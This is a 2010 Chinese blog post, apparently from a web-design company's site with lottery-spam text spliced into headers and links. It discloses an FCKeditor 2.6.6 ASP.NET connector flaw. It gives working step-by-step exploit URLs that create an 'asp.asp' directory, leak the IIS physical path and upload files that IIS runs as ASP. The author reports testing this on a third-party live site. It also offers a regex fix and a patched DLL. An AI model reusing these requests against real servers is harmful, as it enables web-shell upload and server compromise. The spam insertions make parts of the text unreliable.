青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
黑龙江11选5预测网 黑龙江11选5预测网 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:黑龙江11选5预测网 >> 腳本安全 >> 正文  
[原創]最新FckEditor2.6.6 漏洞

文章來源: 黑龙江11选5预测网     發布時間:2010-9-2    瀏覽次數:32518    tags:0day

今日在FckEditor官方網站下載了最新版的編輯器,然后粗略的研究了一下,下載的版本信息官方網站顯示如下。

 

以下是引用片段:

FCKeditor

Our previous editor solution, stable and full featured

黑龙江11选5预测网 www.ymbxx.icu FCKeditor 2.6.6, released on 15 February 2010

download zip download tar


FCKeditor.Net: ASP.Net Control to easily integrate FCKeditor on ASP.NET pages

FCKeditor.Net 2.6.4, released on 30 August 2010

Attention: The main code is not included in this package, just the ASP.Net Control. You still need the FCKeditor scripts to be able to run it, so download it too.

download zip

文件解壓以后顯示,FredCK.FCKeditorV2.dll文件的修改時間是2010年8月30日13:55的,而今天是9月2日。

本人只測試了一下ASP.NET的功能,其它代碼中不知道有沒有問題,沒有測試。我們可以通過下載包中默認的文件

//www.ymbxx.icu/fckeditor/editor/filemanager/connectors/test.html

//www.ymbxx.icu/fckeditor/editor/filemanager/connectors/uploadtest.html

在服務器上創建ASP.ASP目錄。要是以上文件被管理員刪除,則請訪問:  提交地址://www.ymbxx.icu/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder 

輕易在服務器上新建一個ASP.ASP目錄,大家知道,新建了一個這樣的目錄,我們就可以在往此目錄中上傳任何類型的文件,服務器就會把此文件當ASP文件來解析,所以危害還是比較大滴。二話不說,上圖,圖比什么都清楚,很弱智的漏洞,很好利用。

點擊查看大圖

 

漏洞利用方法:

   在當前目錄中添加 /asp.asp目錄,然后再點Create Folder 新建一個目錄 ,這樣就會在服務器上新建一個asp.asp的目錄,并且它很老實的連你的路徑都顯示出來,真不知道這老外是怎么想的,利用很簡單吧?

漏洞產生原因:

  打開它的代碼文件Connector.cs,作者是這樣寫的,注意,漢字注釋是我自己加上去的

以下是引用片段:

   // Get the main request information.
   string sCommand = Request.QueryString["Command"] ;
   string sResourceType = Request.QueryString[ "Type" ];
   string sCurrentFolder = Request.QueryString[ "CurrentFolder" ];   //這些行是獲取客戶端提交的

......省略N行

// Check the current folder syntax (must begin and start with a slash).  //檢查語法
   if ( ! sCurrentFolder.EndsWith( "/" ) )
    sCurrentFolder += "/" ;
   if ( ! sCurrentFolder.StartsWith( "/" ) )
    sCurrentFolder = "/" + sCurrentFolder ;

   if ( Regex.IsMatch( sCurrentFolder, @"(/\.)|(\.\.)|(//)|([\\:\*\?""\<\>\|\p{C}])" ) )   //然后用正則匹配 。 將不合法的目錄名匹配出來
   {
    XmlResponseHandler.SendError( Response, 102, "" );
    return;
   }

   本人測試發現,作者寫的正則有點問題,它不能匹配出“.”這個符號,所以引起了漏洞。在自己稍微修改了一下,把正則表達式換成這樣子的 :"(/\.)|(\.)+|(//)|([\\:\*\?""\<\>\|\p{C}])" 應該就可以了。注意,我本人對繁瑣的正則表達式也記不住,大家自己檢查吧!不過最保險的方法應該是直接把不合法的符號replace()掉,肯定是不會錯的 

  漏洞修補方法:修改原代碼,重新生成一下,然后取出生成的那個DLL文件,傳到自己網站的BIN目錄,將原來的覆蓋即可,為了方便大家,我這里已經編輯好了一個,大家直接下載去用吧!我編譯的是.NET 2.0環境的。點擊此處下載FredCK.FCKeditorV2.rar  

  另外,今天又發現fckeditor還有暴物理路徑的漏洞,上面的內容是昨天寫的。于是再次修改代碼,將此漏洞補上,大家直接下載這一個文件包吧!FredCK.FCKeditorV2.rar  這一個修補了兩個漏洞,一個是在服務器創建asp.asp這樣目錄的漏洞,一個是泄露WEB物理路徑的漏洞,后面的漏洞官方不知道是沒有發現,還是沒有重視,從來沒有修補,除此之外網上公布的其它漏洞,經過測試,在這個版本中幾乎都修補了。盡管這樣,也有可能還有新的漏洞沒有被公布出來,如果大家知道的話,告訴本人。

后記:本人在GOOGLE找了一個網站,找的站上面用的是最新的FCKEDITOR,用以下方式成功在服務器上新建一個ASP.ASP/SHELL.JPG文件。

以下是測試步驟

注意,域名換成本站的了,請不要對號入座。測試站點上面好多文件被刪除,所以用了最保守的方法進行測試,也就是說只要編輯器能上傳文件,且能正常使用,即可測試成功。

第一步:

查看信息 //www.ymbxx.icu/editor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F 

返回如下信息

 <?xml version="1.0" encoding="utf-8" ?>

- <Connector command="GetFoldersAndFiles" resourceType="File">
  <CurrentFolder path="/" url="/uploader/fckdir/" />
- <Folders>
  <Folder name="XXX" />
  </Folders>
  <Files />
  </Connector>

第二步:

在服務器新建一個ASP.ASP目錄: //www.ymbxx.icu/editor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder

注意CurrentFolder參數值 :/asp.asp

如果沒有意外,這一步下來會在服務器上生成一個ASP.ASP文件夾

第三步:報IIS路徑

在瀏覽器提交://www.ymbxx.icu/editor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/

頁面反回IIS WEB路徑如下:

D:\wwwroot\x\www.ymbxx.icu\xxxx\uploader\fckroot\file\asp.asp  [過于敏感,我稍微處理了一下路徑]

第四步:上傳文件。這一步經歷了一點小小的麻煩,不過很快搞定了。

  一開始想的是這樣提交 HTTP://URL/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2Fasp.asp 但是不成功。另尋它法。在瀏覽器中訪問它的Editor/fckdialog.html 文件也不行。自己在自己的電腦上抓包,得到如下路徑:

GET /FekEditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.myurl.com%2FSuperEditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx HTTP/1.1
Accept: */*
GET /FekEditor/editor/filemanager/browser/default/frmresourcetype.html HTTP/1.1

GET /FekEditor/editor/filemanager/browser/default/frmfolders.html

OK,第一個頁面就夠了,后面兩個可以不用。把第一個頁面地址中的域名信息換成對方的,然后在瀏覽器提交

//www.ymbxx.icu/editor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F黑龙江11选5预测网 www.ymbxx.icu%2Feditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx

注意紅色部分type的值,一開始是FILE,現在抓包下來的是IMAGES,所以提交這個頁面后雖然能正常返回服務器瀏覽文件的頁面,但是看不到剛剛新建的ASP.ASP目錄,沒關系,把紅色的IMAGES換成FILE再試,OK,我們剛剛新建的ASP.ASP目錄被列出來了,剩下的事情就是傳一個ABC.TXT或ABC.JPG之類的文件到ASP.ASP目錄中去,當做ASP執行吧。你說什么?你不知道傳上去文件的目錄在哪?開什玩笑,剛剛不是暴出IIS的WEB物理路徑了嗎?這個也要問?

注意:本文只是證實了漏洞的存在,并提供了修補文件,請勿用此方法攻擊別人站點,否則法律責任自負,與本站及文章作者無關。作者QQ:[壹4柒叁狗狗120]原創文章,轉請請注明出處://www.ymbxx.icu/ShowNews/?11-20109214030542523.html 否則停止轉載,謝謝!


上一篇:?;し幢槐;の蟥D―桃源網盤新漏洞
下一篇:asp.net 使用駐留在頁面中的Cache緩存常用可定時更新的數據
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) www.ymbxx.icu All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做、青海網站建設、青海網頁設計、西寧網站制做、西寧網站建設、青海域名注冊、青海網絡推廣、青海網站推廣、青??占渥庥?/a>、黑龙江11选5预测网、黑龙江11选5预测网、網絡安全